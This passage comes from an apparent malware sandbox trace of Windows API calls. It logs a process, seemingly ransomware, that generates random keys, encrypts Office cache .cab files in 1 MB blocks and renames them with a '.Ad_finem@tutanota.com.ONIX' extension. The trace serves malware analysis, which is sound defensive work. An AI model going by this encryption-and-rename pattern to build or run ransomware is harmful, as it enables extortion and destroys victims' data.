lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.529] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.529] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.530] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.530] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.556] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0109.556] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.563] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.563] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.563] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.563] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.574] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0109.574] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.587] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.596] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.599] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.599] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.615] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0109.615] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.621] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.621] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.631] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.631] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.646] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0109.646] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.662] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.662] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.664] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.664] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.690] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000 [0109.690] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.696] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.696] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x2b30020 | out: hHeap=0x410000) returned 1 [0109.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x3680020 | out: hHeap=0x410000) returned 1 [0109.706] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa97cbdb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0109.706] CloseHandle (hObject=0x490) returned 1 [0109.707] GetProcessHeap () returned 0x410000 [0109.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0109.707] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0109.710] GetProcessHeap () returned 0x410000 [0109.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0109.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0109.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0109.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0109.710] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0109.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0109.710] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0109.710] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0109.710] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0109.710] GetLastError () returned 0x0 [0109.710] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0109.711] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0109.711] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd49ee31, nNumberOfBytesToLockHigh=0x0) returned 1 [0109.711] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.711] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0109.716] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.716] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0109.717] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0109.717] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0109.717] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", dwFileAttributes=0x80) returned 1 [0109.717] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 76 [0109.717] GetProcessHeap () returned 0x410000 [0109.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0109.717] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" [0109.717] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0109.717] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=222948913) returned 1 [0109.717] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd49ee31 [0109.717] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0109.717] GetProcessHeap () returned 0x410000 [0109.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0109.717] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0109.717] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0109.719] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0109.720] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.721] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x2b30020 [0109.721] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x3680020 [0109.721] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.721] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.771] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.771] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.772] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.772] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.784] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0109.784] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.791] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.791] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.794] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.794] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.807] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0109.807] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.828] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.828] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.828] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.828] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.854] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0109.854] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.861] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.861] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.862] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.862] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.874] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0109.874] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.894] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.894] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.895] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.895] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.909] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0109.909] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.915] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.915] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.917] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.917] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.930] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0109.931] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.942] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.942] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.953] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.953] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.980] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000 [0109.980] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.989] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.989] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.990] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xab00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.990] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0110.003] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab00000 [0110.003] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0110.010] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.010] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0110.023] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xbe00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.024] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0110.050] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbe00000 [0110.050] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0110.057] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 